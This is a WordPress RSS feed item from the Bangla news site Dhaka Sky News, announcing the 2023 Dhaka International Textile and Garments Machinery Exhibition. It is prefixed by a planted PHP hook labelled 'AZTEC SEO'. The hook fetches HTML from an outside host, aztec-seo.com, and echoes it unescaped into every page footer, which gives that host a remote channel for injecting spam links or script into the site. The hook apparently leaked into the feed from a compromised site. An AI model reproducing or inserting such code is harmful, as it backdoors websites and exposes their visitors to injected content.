/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); গার্মেন্টস ও টেক্সটাইল এক্সপো – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Mon, 06 Feb 2023 14:09:26 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 ঢাকা আন্তর্জাতিক গার্মেন্টস ও টেক্সটাইল এক্সপো ১৫ ফেব্রুয়ারি শুরু https://www.dhakaskynews.com/business/2023/02/06/News_ID-3923/ https://www.dhakaskynews.com/business/2023/02/06/News_ID-3923/#respond Mon, 06 Feb 2023 14:09:26 +0000 https://www.dhakaskynews.com/?p=3923 বাংলাদেশের পোশাক ও বস্ত্র খাতের সবচেয়ে বড় আন্তর্জাতিক এক্সিবিশন ‌‘ঢাকা ইন্টারন্যাশনাল টেক্সটাইল অ্যান্ড গার্মেন্টস মেশিনারি এক্সিবিশন’ (ডিটিজি ২০২৩) শুরু হবে আগামী ১৫ ফেব্রুয়ারি । রাজধানীর ইন্টারন্যাশনাল কনভেনশন সিটি বসুন্ধরায় চারদিনব্যাপী এ মেলাটি চলবে ১৮ ফেব্রুয়ারি পর্যন্ত।

ডিটিজি’র ১৭তম এ সংস্করণটির আয়োজনে বরাবরের মতই আছে, বাংলাদেশ টেক্সটাইল মিলস অ্যাসোসিয়েশন (বিটিএমএ) এবং ইয়র্কার্স ট্রেড অ্যান্ড মার্কেটিং সার্ভিস কোম্পানি লিমিটেড।

প্রায় দুই দশক ধরে ডিটিজি, বাংলাদেশে টেক্সটাইল ও গার্মেন্টস মেশিনারি পণ্যগুলির অত্যাধুনিক প্রযুক্তি প্রদর্শনের সবচেয়ে বড় প্লাটফর্ম হিসেবে কাজ করে যাচ্ছে।

বিগত ৩ বছরের করোনাকালীন পরিস্থিতিতে সবকিছুর মতই থেমে ছিল ডিটিজি’র এ ১৭তম সংস্করণটি। তাই আয়োজকদের প্রত্যাশা, এবারের মেলায় আগ্রহী ব্যবসায়ী, ক্রেতা ও দর্শনার্থী-সবার উপস্থিতিই থাকবে আগের যেকোনো সংস্করণের তুলনায় অনেক বেশি।

আইসিসিবি’র ৪টি হল ও পুরো এক্সপো জোন জুড়ে থাকবে ৩২টি দেশের ১২০০টি আন্তর্জাতিক আইকনিক ব্র্যান্ড এবং ১৬০০টি বুথ-যারা একত্রিত হবে দেশ বিদেশের সর্বাধুনিক গার্মেন্টস ও টেক্সটাইল মেশিনারি সলিউশন নিয়ে।

১৫ থেকে ১৮ ফেব্রুয়ারি-এ চারদিনই মেলাটি দর্শনার্থীদের জন্য উন্মুক্ত থাকবে বেলা ১২টা থেকে রাত ৮টা পর্যন্ত। দর্শনার্থীদের জন্য মেলায় অন-স্পট রেজিস্ট্রেশনের ব্যবস্থা থাকবে। এছাড়া আগে থেকেই অনলাইন রেজিস্ট্রেশন করে ফেলা যাবে নিচের লিংকে গিয়ে–chanchao.com.tw/DTG/visitorReg.asp

]]>
https://www.dhakaskynews.com/business/2023/02/06/News_ID-3923/feed/ 0